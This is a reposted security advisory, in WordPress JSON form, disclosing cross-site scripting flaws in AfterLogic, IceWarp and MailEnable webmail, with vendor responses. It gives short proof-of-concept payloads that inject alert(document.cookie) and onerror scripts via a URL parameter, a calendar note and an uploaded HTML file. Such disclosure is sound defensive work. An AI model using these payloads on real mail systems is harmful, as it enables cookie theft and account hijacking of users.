{"id":6281,"date":"2017-01-23T14:08:18","date_gmt":"2017-01-23T22:08:18","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/01\/23\/news-132\/"},"modified":"2017-01-23T14:08:18","modified_gmt":"2017-01-23T22:08:18","slug":"news-132","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/01\/23\/news-132\/","title":{"rendered":"SSD Advisory &#8211; Icewarp, AfterLogic and MailEnable Code Injection"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/Afterlogic-webmail-vulnerability-300x135.png\"\/><\/p>\n<div class=\"entry-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory describes three (3) vulnerabilities in Icewarp, AfterLogic and MailEnable Webmails.<\/p>\n<p>The three vulnerabilities found are:<\/p>\n<ol>\n<li>Afterlogic Webmail code injection<\/li>\n<li>Icewarp Webmail code injection<\/li>\n<li>MailEnable Webmail code injection<\/li>\n<\/ol>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor Responses<\/strong><br \/> <strong>AfterLogic<\/strong><br \/> AfterLogic has released patch to address the vulnerability &#8211; we have no information on which version addresses this, we believe the latest version of AfterLogic includes patches for the vulnerability. <\/p>\n<p><strong>IceWarp<\/strong><br \/> IceWarp has released patch to address the vulnerability &#8211; version 11.4.0.<\/p>\n<p><strong>MailEnable<\/strong><br \/> We notified MailEnable of the vulnerabilities back in November 2015, repeated attempts to re-establish contact and get some answer on the status of the patches for these vulnerabilities went unanswered. At this time there is no solution or workaround for these vulnerabilities.<\/p>\n<p><span id=\"more-2937\"><\/span><\/p>\n<p><u><strong>Vulnerability Details<\/strong><\/u><br \/> <u>Afterlogic Webmail code injection<\/u><br \/> The vulnerability occurs in <em>login.aspx<\/em> file. Afterlogic Webmail do not sanitize user input parameter <em>LanguageID<\/em>, allowing for code injection.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867ed08c895424968302\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> Site.com\/Mondo\/lang\/sys\/login.aspxLanguageID=EN55341&#8217;%3balert(1)%2f%2f939&amp;UserID=test@test&amp;Password=test&amp;Method=Auto&amp;skin=Pacific&amp;offset=180<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0017 seconds] -->  <\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/Afterlogic-webmail-vulnerability.png\" data-slb-active=\"1\" data-slb-asset=\"1588438829\" data-slb-internal=\"0\" data-slb-group=\"2937\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/Afterlogic-webmail-vulnerability-300x135.png\" alt=\"\" width=\"300\" height=\"135\" class=\"alignnone size-medium wp-image-2938\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/Afterlogic-webmail-vulnerability-300x135.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/Afterlogic-webmail-vulnerability-768x346.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/Afterlogic-webmail-vulnerability-1024x461.png 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/Afterlogic-webmail-vulnerability-604x270.png 604w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/Afterlogic-webmail-vulnerability.png 1109w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><u>Proof of Concept<\/u><br \/>  Send email with the following link:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867ed08c8a4720438653\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &lt;a href=&#8221;demo.test.com\/Mondo\/lang\/sys\/login.aspx?LanguageID=EN55341&#8217;%3balert(document.cookie)%2f%2f939&amp;UserID=test@test&amp;Password=demo&amp;Method=Auto&amp;skin=Pacific&amp;offset=180&#8243;&gt;Visit our HTML tutorial&lt;\/a&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867ed08c8a4720438653-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867ed08c8a4720438653-1\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;demo.test.com\/Mondo\/lang\/sys\/login.aspx?LanguageID=EN55341&#8217;%3balert(document.cookie)%2f%2f939&amp;UserID=test@test&amp;Password=demo&amp;Method=Auto&amp;skin=Pacific&amp;offset=180&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">Visit <\/span><span class=\"crayon-e\">our <\/span><span class=\"crayon-e\">HTML <\/span><span class=\"crayon-v\">tutorial<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0008 seconds] -->  <\/p>\n<p><u>Icewarp Webmail code injection<\/u><br \/> The vulnerability occurs when injected HTML\/Javascript in the body of a calendar note. Once an attacker injected to malicious code to the &#8220;event&#8221;, anyone that will open the &#8220;event&#8221; will run the malicious code.<\/p>\n<p><u>Proof of Concept<\/u><\/p>\n<p>Insert the next script into the &#8220;note&#8221; section in the calender&#8217;s event:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867ed08c8aa829794164\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">  &#8220;&gt;&lt;img src=x onerror=prompt(1);&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867ed08c8aa829794164-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867ed08c8aa829794164-1\"><span class=\"crayon-h\"> <\/span>&#8220;<span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">img <\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-i\">x<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">onerror<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">prompt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0007 seconds] -->  <\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/Icewarp-Webmail-1.png\" data-slb-active=\"1\" data-slb-asset=\"1260409677\" data-slb-internal=\"0\" data-slb-group=\"2937\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/Icewarp-Webmail-1-300x163.png\" alt=\"\" width=\"300\" height=\"163\" class=\"alignnone size-medium wp-image-2939\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/Icewarp-Webmail-1-300x163.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/Icewarp-Webmail-1-768x417.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/Icewarp-Webmail-1.png 1022w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/Icewarp-Webmail-2.png\" data-slb-active=\"1\" data-slb-asset=\"771658397\" data-slb-internal=\"0\" data-slb-group=\"2937\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/Icewarp-Webmail-2-300x170.png\" alt=\"\" width=\"300\" height=\"170\" class=\"alignnone size-medium wp-image-2940\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/Icewarp-Webmail-2-300x170.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/Icewarp-Webmail-2-768x434.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/Icewarp-Webmail-2.png 957w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><u>MailEnable Webmail code injection<\/u><br \/> The vulnerability occurs when an HTML file is uploaded to the file repository. MailEnable Webmail don&#8217;t sanitize file content, an attacker can upload a file with malicious code, for example httponly document.cookie to repository. The victim will click the file and the malicious code will run.<\/p>\n<p><u>Proof of Concept<\/u><br \/> Create an HTML file with the following content:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867ed08c8b0910849144\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &lt;script&gt;alert(document.cookie)&lt;\/script&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867ed08c8b0910849144-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867ed08c8b0910849144-1\"><span class=\"crayon-ta\">&lt;script&gt;<\/span><span class=\"crayon-r\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">cookie<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-ta\">&lt;\/script&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0030 seconds] -->  <\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/Afterlogic-Webmail-1.png\" data-slb-active=\"1\" data-slb-asset=\"247962072\" data-slb-internal=\"0\" data-slb-group=\"2937\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/Afterlogic-Webmail-1-300x175.png\" alt=\"\" width=\"300\" height=\"175\" class=\"alignnone size-medium wp-image-2941\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/Afterlogic-Webmail-1-300x175.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/Afterlogic-Webmail-1.png 729w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/Afterlogic-Webmail2.png\" data-slb-active=\"1\" data-slb-asset=\"1117835360\" data-slb-internal=\"0\" data-slb-group=\"2937\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/Afterlogic-Webmail2-300x124.png\" alt=\"\" width=\"300\" height=\"124\" class=\"alignnone size-medium wp-image-2942\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/Afterlogic-Webmail2-300x124.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/Afterlogic-Webmail2-768x318.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/Afterlogic-Webmail2-1024x424.png 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/Afterlogic-Webmail2.png 1064w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/2937\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/Afterlogic-webmail-vulnerability-300x135.png\"\/><br \/>Vulnerabilities Summary The following advisory describes three (3) vulnerabilities in Icewarp, AfterLogic and MailEnable Webmails. The three vulnerabilities found are: Afterlogic Webmail code injection Icewarp Webmail code injection MailEnable Webmail code injection Credit An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program. Vendor Responses AfterLogic AfterLogic has released patch &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/2937\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory &#8211; Icewarp, AfterLogic and MailEnable Code Injection<\/span> <span class=\"meta-nav\">&#8594;<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[10757],"class_list":["post-6281","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6281","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=6281"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6281\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=6281"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=6281"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=6281"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}